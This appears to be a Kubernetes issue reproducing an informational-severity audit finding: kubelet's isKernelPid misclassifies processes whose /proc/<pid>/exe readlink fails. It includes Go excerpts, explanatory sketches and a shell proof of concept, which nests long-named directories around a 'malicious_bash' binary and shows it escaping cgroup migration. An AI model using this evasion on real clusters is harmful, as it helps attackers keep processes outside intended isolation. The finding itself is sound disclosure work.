This issue was reported in the Kubernetes Security Audit Report
Description
The isKernelPid function (Figure 35.1) decides whether a given PID belongs to a kernel thread by checking whether a readlink of /proc/<pid>/exe returns an error. This check is used to filter out kernel processes; all other processes found in the root devices cgroup are moved into the manager's potentially less privileged cgroup (Figure 35.2).
The check performed by isKernelPid is too broad: any error is treated as proof of a kernel thread. It is therefore possible to create a process that is classified as a kernel PID and is not moved into the potentially less privileged devices cgroup.
A readlink of a kernel process's /proc/<pid>/exe returns an ENOENT error (Figure 35.3). However, the same operation can be made to return a different error for an ordinary process, for example by placing the executable under an overly long path (Figure 35.4).
Although the isKernelPid check can be bypassed, it is only invoked on processes in the root ("/") devices cgroup, and only in a non-default kubelet configuration: when the system cgroups name is set and the cgroup root is "/" (Figure 35.5). This configuration is enabled by passing --system-cgroups=/something --cgroup-root=/ to the kubelet.
Exploiting this issue requires the attacker to control a process in the root devices cgroup, as well as a privileged user with the CAP_SYS_ADMIN capability, which is needed to modify the rules for devices cgroups and is present by default unless explicitly dropped. Exploitation is, therefore, unlikely.
// Determines whether the specified PID is a kernel PID.
func isKernelPid(pid int) bool {
	// Kernel threads have no associated executable.
	_, err := os.Readlink(fmt.Sprintf("/proc/%d/exe", pid))
	return err != nil
}
Figure 35.1: The isKernelPid function in pkg/kubelet/cm/container_manager_linux.go:869.
func ensureSystemCgroups(rootCgroupPath string, manager *fs.Manager) error {
	// Move non-kernel PIDs to the system container.
	// (...)
	for attemptsRemaining >= 0 {
		// (...)
		allPids, err := cmutil.GetPids(rootCgroupPath)
		// (...)
		// Remove kernel pids and other protected PIDs (pid 1, PIDs already in system & kubelet containers)
		pids := make([]int, 0, len(allPids))
		for _, pid := range allPids {
			if pid == 1 || isKernelPid(pid) {
				continue
			}
			pids = append(pids, pid)
		}
		// (...)
		for _, pid := range pids {
			err := manager.Apply(pid)
			// (...)
		}
		// (...)
Figure 35.2: ensureSystemCgroups calls isKernelPid to filter kernel PIDs out of the processes in the "/" devices cgroup (the rootCgroupPath argument is hardcoded to "/", and cmutil.GetPids returns the PIDs of the given devices cgroup), then moves the remaining non-kernel PIDs into the manager's cgroup.
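The filtering step in Figure 35.2 can be isolated as a pure function to show why a misclassified PID escapes migration. The sketch below is a simplified restatement, not kubelet code: movablePids is a hypothetical name, and the PIDs in main are illustrative values chosen to match the exploit scenario (3682 stands for the attacker's process whose readlink fails with ENAMETOOLONG).

```go
package main

import "fmt"

// movablePids mirrors, in simplified form, the loop in Figure 35.2:
// PID 1 and every PID accepted by isKernel are skipped, and all remaining
// PIDs are returned as candidates to be moved out of the "/" cgroup.
func movablePids(all []int, isKernel func(int) bool) []int {
	pids := make([]int, 0, len(all))
	for _, pid := range all {
		if pid == 1 || isKernel(pid) {
			continue
		}
		pids = append(pids, pid)
	}
	return pids
}

func main() {
	// Illustrative PIDs: 2 is a kernel thread (readlink fails with ENOENT),
	// 3682 is the attacker's process (readlink fails with ENAMETOOLONG),
	// and 5000 is an ordinary process whose readlink succeeds.
	readlinkFails := map[int]bool{2: true, 3682: true}
	// The original predicate treats any readlink error as "kernel".
	broad := func(pid int) bool { return readlinkFails[pid] }
	fmt.Println(movablePids([]int{1, 2, 3682, 5000}, broad)) // prints [5000]
}
```

With the broad predicate, only PID 5000 is moved; the attacker's PID 3682 stays in the root devices cgroup alongside the genuine kernel thread.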
# ps aux | grep kworker | head -n1
root 4 0.0 0.0 0 0 ? I< 09:28 0:00 [kworker/0:0H]
# strace -e readlink,readlinkat readlink /proc/4/exe
readlink("/proc/4/exe", 0x55f7adc34100, 64) = -1 ENOENT (No such file or directory)
+++ exited with 1 +++
Figure 35.3: Reading the link of a kernel process results in ENOENT. Note that we read the link as root; as an unprivileged user, we would get an EACCES error.
$ cp /bin/bash malicious_bash
$ for i in {1..30}; do mkdir `python -c 'print("A"*250)'` && mv ./malicious_bash ./AA* && cd ./AA*; done
$ ./malicious_bash
$ strace -e readlink,readlinkat readlink /proc/$$/exe
readlink("/proc/10089/exe", 0x563f05b47100, 64) = -1 ENAMETOOLONG (File name too long)
+++ exited with 1 +++
Figure 35.4: Making readlink of /proc/<pid>/exe return an ENAMETOOLONG error by placing the binary under an overly long path.
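The loop in Figure 35.4 nests 30 directories, each with a 250-character name (below the usual 255-byte NAME_MAX), and changes into each one in turn so that no single syscall ever receives the full path. The resulting path is far longer than Linux's PATH_MAX of 4096 bytes. Our assumption is that procfs formats the /proc/<pid>/exe target into a buffer of that size, so a longer target cannot be returned and readlink fails with ENAMETOOLONG. The sketch below only does the arithmetic on the relative path; nestedPath and pathMax are names introduced for illustration.

```go
package main

import (
	"fmt"
	"strings"
)

// pathMax is Linux's PATH_MAX (4096 bytes, including the terminating NUL).
const pathMax = 4096

// nestedPath builds the relative path produced by the Figure 35.4 loop:
// depth directories, each named with nameLen 'A' characters, followed by
// the binary name. Hypothetical helper for illustration only.
func nestedPath(depth, nameLen int, binary string) string {
	dirs := make([]string, depth)
	for i := range dirs {
		dirs[i] = strings.Repeat("A", nameLen)
	}
	return strings.Join(append(dirs, binary), "/")
}

func main() {
	p := nestedPath(30, 250, "malicious_bash")
	// 30*250 name bytes + 30 separators + 14 bytes of binary name.
	fmt.Println(len(p), len(p) >= pathMax) // prints 7544 true
}
```

The absolute path seen by the kernel is longer still, since it also includes the starting working directory.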
if cm.SystemCgroupsName != "" {
	if cm.SystemCgroupsName == "/" {
		return fmt.Errorf("system container cannot be root (\"/\")")
	}
	cont := newSystemCgroups(cm.SystemCgroupsName)
	cont.ensureStateFunc = func(manager *fs.Manager) error {
		return ensureSystemCgroups("/", manager)
	}
	systemContainers = append(systemContainers, cont)
}
Figure 35.5: ensureSystemCgroups is called only if the SystemCgroupsName (--system-cgroups) configuration parameter is not empty; this parameter must be specified together with the --cgroup-root parameter.
Exploit Scenario
The example below demonstrates exploitation: a process spawned under a long path is not moved from the root devices cgroup to another devices cgroup. For the demonstration, the process was first moved into the root devices cgroup manually with cgclassify, as shown in Figure 35.6. For comparison, Figure 35.7 shows the standard, expected kubelet behavior, in which the process is properly migrated to a different cgroup.
# cp /bin/bash malicious_bash
# for i in {1..30}; do mkdir `python -c 'print("A"*250)'` && mv ./malicious_bash ./AA* && cd ./AA*; done
# ./malicious_bash
# pidof malicious_bash
3682
# ls -la /proc/$$/exe
ls: cannot read symbolic link '/proc/3682/exe': File name too long
lrwxrwxrwx 1 root root 0 Apr 18 13:07 /proc/3682/exe
# cat /proc/$$/cgroup | grep devices
12:devices:/user.slice
# cgclassify -g devices:/ $$
// in the meantime, kubelet has been launched with `--system-cgroups=/user.slice --cgroup-root=/` flags
// by modifying the kubelet code, we could find out it detected those pids as system pids: [1 2 4 6 7 8 9 10 11 12 13 14 15 16 18 19 20 21 22 24 25 26 27 28 30 31 32 33 34 36 37 38 39 40 41 42 43 44 45 46 47 48 49 55 56 57 99 100 101 102 103 104 110 119 136 225 226 228 229 232 234 299 307 348 356 357 425 427 428 429 430 544 2329 2846 2892 2954 3123 3124 3183 3356 3682 8354 10720 10836 15971]
// so the pid of malicious_bash (3682) is there
// and we got such log:
// container_manager_linux.go:887] Found 85 PIDs in root, 85 of them are not to be moved
# cat /proc/$$/cgroup | grep devices
12:devices:/
Figure 35.6: Although kubelet found the attacker-controlled process, it did not move it to another devices cgroup, because the process was placed under an overly long path to trick the isKernelPid check.
# cat /proc/$$/cgroup | grep devices
12:devices:/user.slice
# cgclassify -g devices:/ $$
# cat /proc/$$/cgroup | grep devices
12:devices:/
// in the meantime, kubelet has been launched with `--system-cgroups=/user.slice --cgroup-root=/` flags
# cat /proc/$$/cgroup | grep devices
12:devices:/user.slice
Figure 35.7: The standard kubelet behavior, in which non-kernel processes in the root devices cgroup are moved to the other cgroup.
Recommendation
isKernelPid should explicitly check the error returned from os.Readlink and return true only if the error value is ENOENT.
Anything else we need to know?:
See #81146 for current status of all issues created from these findings.
The vendor gave this issue an ID of TOB-K8S-027 and it was finding 36 of the report.
The vendor considers this issue Informational Severity.
To view the original finding, begin on page 85 of the Kubernetes Security Review Report.
Environment:
- Kubernetes version: 1.13.4